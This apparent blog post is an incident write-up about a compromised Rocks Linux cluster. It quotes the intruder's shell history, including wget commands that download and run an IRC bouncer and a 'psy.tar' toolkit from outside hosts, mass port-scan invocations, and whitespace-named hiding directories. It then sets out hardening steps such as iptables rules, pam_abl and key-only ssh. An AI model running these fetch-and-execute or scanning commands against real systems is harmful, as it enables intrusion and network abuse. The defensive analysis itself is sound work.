Hardening security on your Rocks system(s)

We now understand the attack vector. It turned out to be simple, and some of the things we have done have now closed that door. It was a pretty simple door, but still worth noting. BTW: some don’t like early disclosure of exploits. I have heard from ~6 people (off the Rocks list) since posting that they have seen similar attacks attempted.

The entry point was via a shared user account. Once this account was compromised, our new friend from Romania started working. We found this (cluster name changed to protect the compromised):

[root@xxxxx user]# ls -alFt | head -10
total 2980
drwxr-xr-x   6 root root       0 Oct 23 14:40 ../
drwx------   7 user user    4096 Oct 23 12:05 ./
drwxr-xr-x   2 user user    4096 Oct 23 12:05 bodo-scan/
drwxr-xr-x   2 user user    4096 Oct 23 12:05 chyna/
-rw-------   1 user user    7894 Oct 23 00:18 .bash_history 

and in these directories, we found

[root@xxxxx user]# ls bodo-scan/ chyna
112.pscan.22  a   a3    common       go.sh    pass_file    pico    ss
93.pscan.22   a2  auto  gen-pass.sh  mfu.txt  pass_filees  pscan2  start

152,.2.pscan.22  72.20.pscan.22  core      pass1          pscan2  vuln.txt
152.2.pscan.22   79.36.pscan.22  go.sh     pass1.save     screen
189.81.pscan.22  a               help.txt  pass_file      ss
61.168.pscan.22  checkroot       mass      pass_file.bak  usage

Hmmm. Reports from the network monitoring team seemed to indicate that this unit was scanning at a massive rate. It knocked portions (as we were told) of this university off the net for a few hours last night.

OK, we see suspicious files in an account that shouldn’t have been shared, but was. Anything more concrete?


These folks left their .bash_history chock full of what they did. They were obviously trying to p0wn the machine. It didn’t start to get interesting until here:

nano vuln.txt
./unix 129.219
cd /dev/shm

ok … they have my attention. Here is where it gets exciting. Remember that little kernel vulnerability from a few months ago? The one where you could force a system call to fail in a particular way, and get root? The one where, if you have not patched your kernel in a few months you are at risk?

They did try that as far as I can tell.

This was a patched system. We had gone so far as to replace the standard ssh daemon with an updated one reflecting the latest security and bug patches, and to remove extraneous packages (there are still a few too many, and we need to pull them off). So it appears they gave up on trying to crack that system, and instead tried to turn it into a scanner. This they were successful at doing.

/start 66.233
./start 66.234
./start 66.235
./start 66.236
./start 66.239
./start 66.240
./start 66.246
./start 66.247 


chmod +x *
./a 152,.2
./a 152.2
./a 79.33
./a 79.34
./a 79.35
./a 79.36
./a 82.114
./a 82.115
./a 61.168
./a 189.81
./a 67.233
./a 61.168
./a 72.20 

not to mention attempting non-secure port bots:

cd ..
mkdir "  "
cd "  "
wget wget
ps x
cd /var/tmp
ls -a
cd /tmp
ls -a
cd team2
nano vuln.txt
cd /dev/shm 

Notice the name of the directory they made. Look closely at the mkdir.
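
The directory name is nothing but spaces, which makes it easy to overlook in a casual ls. Here is a minimal sketch for hunting down directories like that. It assumes a find that accepts POSIX character classes in -name patterns (GNU find does). The function name find_blank_dirs and the list of places to search are my own choices for illustration, not part of any standard tool.

```shell
# Print directories whose names consist only of whitespace characters.
# find_blank_dirs is a hypothetical helper name, not a standard tool.
find_blank_dirs() {
    # "! -name '*[![:space:]]*'" keeps only names that contain
    # no non-whitespace character at all.
    find "$@" -xdev -type d ! -name '*[![:space:]]*' -print 2>/dev/null
}

# Example (assumed search locations): world-writable spots plus home directories.
# find_blank_dirs /tmp /var/tmp /dev/shm /home
```

Anything this prints deserves a look, since ordinary users rarely have a reason to create such a directory.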

Now if this isn’t bad enough, look at this:

mkdir " "
cd " "
wget members.lycos.co.uk/sonnyremote/psy.tar
tar xzvf psy.tar
rm -rf psy.tar
cd .bash
export PATH=:.
ps -ax 

They are still trying to gain root.

And pulling down tool after tool to do so.

Finally they went for broke, pulling down tools from a number of sites:

wget http://Linux-Help.clan.su/download/psybnc-linux.tgz
wget http://nasaundernet.is-the-boss.com/psybnc-linux.tgz
tar zxvf psybnc-linux.tgz
cd psybnc-linux ; cd psybnc
mv psybnc bash
chmod +x * ; sh
PATH=:$PATH ; bash
PATH=:$PATH ; bash 

and, giving up on that, finished with simple UDP traffic generators, which I won’t reproduce here.

Ok, what lessons can we learn from this, and how can we harden the systems? My initial guess of a root exploit was not fully correct. They tried it, didn’t get there, and achieved secondary goals.

Their goals appear to be, in approximate order:

1) p0wn the machine (take complete control of it)

2) if #1 isn’t possible, then try to turn it into a bot of some sort

3) if #2 isn’t possible, then try to turn it into a traffic generator and take down nets.

4) in all cases, prep for the next attack, making sure you have multiple possible attack vectors, so poison the other ~/.ssh/authorized_keys files, ~/.rhosts files, ~/.shosts files, …

I am guessing I am approximately right, and I am sure that this can be refined quite a bit.
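
Goal 4 above suggests one quick check after any compromise: look at every login trust file and see which ones changed recently. This is a rough sketch only. The helper name list_trust_files, the /home default, and the depth limit of 3 are assumptions for illustration, and it relies on the -maxdepth extension found in GNU and BSD find.

```shell
# List login trust files under a home-directory root, newest first.
# list_trust_files is a hypothetical helper; /home is an assumed default.
list_trust_files() {
    root=${1:-/home}
    # Depth 3 covers <root>/<user>/.ssh/authorized_keys and <root>/<user>/.rhosts.
    find "$root" -maxdepth 3 -type f \
        \( -name authorized_keys -o -name authorized_keys2 \
           -o -name .rhosts -o -name .shosts \) \
        -exec ls -lt {} +
}

# Example: list_trust_files /home
```

A file with a modification time around the break-in, or an .rhosts or .shosts file that nobody remembers creating, is a candidate for closer inspection.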

So how do we stop this? I’ll talk in the context of Rocks cluster(s), but it applies to all (Linux) clusters.

User policy:

1) [mandate] no sharing of accounts. This is verboten. It is easy enough to socially engineer someone into running something they shouldn’t. See all those nice “export PATH=…” things? What happens if root gets into that account, with the path set to look at the local (compromised) path first, before the normal path? Or an end user?

2) [suggestion] consider turning off suid on the mount (e.g. use the “nosuid” mount option). This should not impact any users. If it does, you need to speak with them about why they need suid access, and see if another method will work. This is, curiously, related to the original attack vector assumption, which was based upon a previous compromise of this system.
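
On the PATH point in item 1: both "export PATH=:." and "PATH=:$PATH" from the history put an empty entry at the front of the path, and the shell treats an empty entry as the current directory. A small sketch of a check you could drop into a login script follows. The function name path_searches_cwd is made up for this example, and it only catches empty and "." entries, not other relative entries such as "./bin".

```shell
# Return success (0) if a PATH-style string would search the current directory.
# path_searches_cwd is a hypothetical helper name.
path_searches_cwd() {
    # Wrapping the value in colons turns leading, trailing, and doubled
    # colons into "::", so a single pattern catches every empty entry.
    case ":$1:" in
        *::*|*:.:*) return 0 ;;   # empty entry or "." entry
        *)          return 1 ;;
    esac
}

if path_searches_cwd "$PATH"; then
    echo "WARNING: PATH searches the current directory: $PATH" >&2
fi
```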


1) [strongly urged] use pam_abl. This provides support in the pam layer for banning users based upon failed logins. This is similar to fail2ban, with the advantage that since it works at the pam layer, it can be used for ftp as well as ssh and other login services using pam.

You have to create an /etc/security/pam_abl.conf file, and add an entry to the /etc/pam.d/ file of each service where you want to use it. For example:

# /etc/security/pam_abl.conf

and our /etc/pam.d/sshd file should include this line after the pam_env line:

auth required /lib/security/pam_abl.so config=/etc/security/pam_abl.conf

2) [strongly urged] for any nodes with public IP addresses, limit the range of destination ports using iptables. Someone wants to ssh or wget or ftp a file, sure. Disable most other public access. I am not a fan of iptables on compute nodes, but when we do set these up as login nodes, and purposefully remove as much as possible, this configuration is definitely advised.

Here is what a good /etc/sysconfig/iptables file looks like for these nodes:


# Preamble
-A FORWARD -i eth1 -o eth0 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i eth0 -j ACCEPT
-A INPUT -i eth0 -j ACCEPT
-A INPUT -i lo -j ACCEPT

# Allow these ports
-A INPUT -m state --state NEW -p tcp --dport ssh -j ACCEPT
# Web access to the cluster (comment out the two lines below to disable it).
-A INPUT -m state --state NEW -p tcp --dport https -j ACCEPT
-A INPUT -m state --state NEW -p tcp --dport www -j ACCEPT
-A INPUT -i eth0 -p udp --dport 53 -j ACCEPT

# Standard rules
-A INPUT -p icmp --icmp-type any -j ACCEPT
# Uncomment the line below to log incoming packets.
#-A INPUT -j LOG --log-prefix "Unknown packet:"

# Deny section
-A INPUT -p udp --dport 0:1024 -j REJECT
-A INPUT -p tcp --dport 0:1024 -j REJECT
# Block incoming ganglia packets on public interface.
-A INPUT -p udp --dport 8649 -j REJECT

# specific rejects for security
-A INPUT -p tcp --dport 3306 -i eth1 -j REJECT
-A INPUT -p tcp --dport 111 -i eth1 -j REJECT
-A INPUT -p udp --dport 111 -i eth1 -j REJECT
-A INPUT -p tcp --dport 25 -i eth1 -j REJECT
-A INPUT -p tcp --dport 199 -i eth1 -j REJECT
-A INPUT -p tcp --dport 536 -i eth1 -j REJECT
-A INPUT -p tcp --dport 852 -i eth1 -j REJECT
-A INPUT -p tcp --dport 873 -i eth1 -j REJECT
-A INPUT -p tcp --dport 910 -i eth1 -j REJECT
-A INPUT -p tcp --dport 2049 -i eth1 -j REJECT
-A INPUT -p udp --dport 2049 -i eth1 -j REJECT
-A INPUT -p tcp --dport 32774 -i eth1 -j REJECT

# For a draconian "drop-all" firewall, uncomment the line below.

Could be improved.
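
One way to keep a rule file like this honest is to list what it explicitly opens and compare that against what you meant to allow. The following is a sketch, not a substitute for reading the rules. The function name accepted_ports is invented here, and it only looks at uncommented ACCEPT rules that name a --dport, so blanket accepts such as the eth0 and lo lines do not show up.

```shell
# Print the --dport value of every active ACCEPT rule in an iptables rule file.
# accepted_ports is a hypothetical helper name.
accepted_ports() {
    awk '
        /^[ \t]*#/ { next }                 # skip commented-out rules
        /-j ACCEPT/ {
            for (i = 1; i < NF; i++)
                if ($i == "--dport") print $(i + 1)
        }
    ' "$1"
}

# Example: accepted_ports /etc/sysconfig/iptables
```

Run against the file above, this would list ssh, https, www and 53, which makes it easy to spot a port that crept in.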

3) [strongly urged] for any nodes with public IP addresses, make sure you have /etc/hosts.deny and /etc/hosts.allow set up appropriately. Actively deny everything by default, and only allow what you need.

Here is a good /etc/hosts.deny

# hosts.deny This file describes the names of the hosts which are
# *not* allowed to use the local INET services, as decided
# by the '/usr/sbin/tcpd' server.
# The portmap line is redundant, but it is left to remind you that
# the new secure portmap uses hosts.deny and hosts.allow. In particular
# you should know that NFS uses portmap!

portmap: ALL
http: ALL

Here is a good /etc/hosts.allow
# hosts.allow This file describes the names of the hosts which are
# allowed to use the local INET services, as decided
# by the '/usr/sbin/tcpd' server.

sshd: ALL

4) [strongly recommended] set up minimal sudo access to handle specific end user occasional needs. Do not let users run as root. There is no reason to.

5) [strongly recommended] pro-active login monitoring. Is everyone who is on your system someone who is supposed to be on your system? If you have 10 users spread out all over, this is hard. If you have 20, it is very hard. You should try to get users to let you know where they will be logging in from, so that you can see if it really was them. Because a login gone wrong can do great damage.
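
A low-tech starting point for this kind of monitoring is to tally logins by user and source address. The sketch below assumes input in the layout printed by "last -i" (user, terminal, address, then the time fields). The function name summarize_logins is made up for the example.

```shell
# Count logins per (user, source address) from "last -i" style input on stdin.
# summarize_logins is a hypothetical helper name.
summarize_logins() {
    awk '
        # Skip blank lines, reboot records, and the "wtmp begins" trailer.
        NF >= 3 && $1 != "reboot" && $1 != "wtmp" { count[$1 " " $3]++ }
        END { for (k in count) print count[k], k }
    ' | sort -k1,1nr -k2
}

# Example: last -i | summarize_logins
```

An address that shows up for a user who never travels, or a burst of logins from a network you do not recognize, is the kind of thing worth asking that user about.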

6) [strongly recommended] no passwords. Keys for all, and for all, keys. Keyloggers can’t grab passwords that are never typed. It is possible (and not too hard) to coax PuTTY to use keys. Mac OS X can do this as well, since its ssh and the one in Linux are quite similar. Keys should be refreshed. Contents of ~/.ssh/authorized_keys should be flushed and controlled.
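
Going keys-only means switching off password logins in the ssh daemon with the PasswordAuthentication keyword. Here is a small sketch that checks whether a given sshd_config does so. The function name password_auth_disabled is invented for this example, and it ignores Match blocks and any included files, so treat its answer as a first pass.

```shell
# Succeed (0) if the first PasswordAuthentication setting in the file is "no".
# password_auth_disabled is a hypothetical helper name.
password_auth_disabled() {
    # sshd keeps the first value it sees for a keyword, and keywords are
    # case-insensitive. Commented-out lines do not match because their
    # first field starts with "#".
    awk '
        tolower($1) == "passwordauthentication" { val = tolower($2); exit }
        END { exit (val == "no" ? 0 : 1) }
    ' "$1"
}

# Example:
# password_auth_disabled /etc/ssh/sshd_config || echo "password logins still allowed"
```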

There are a few other things I can probably think of, but this is it for the moment for this post. We are going to implement other techniques for some of our customers which should provide them even better protection, even against errant port scanners and other annoying crackers.

Regardless of that, please do patch your systems. Especially if your kernel is more than a few months old.
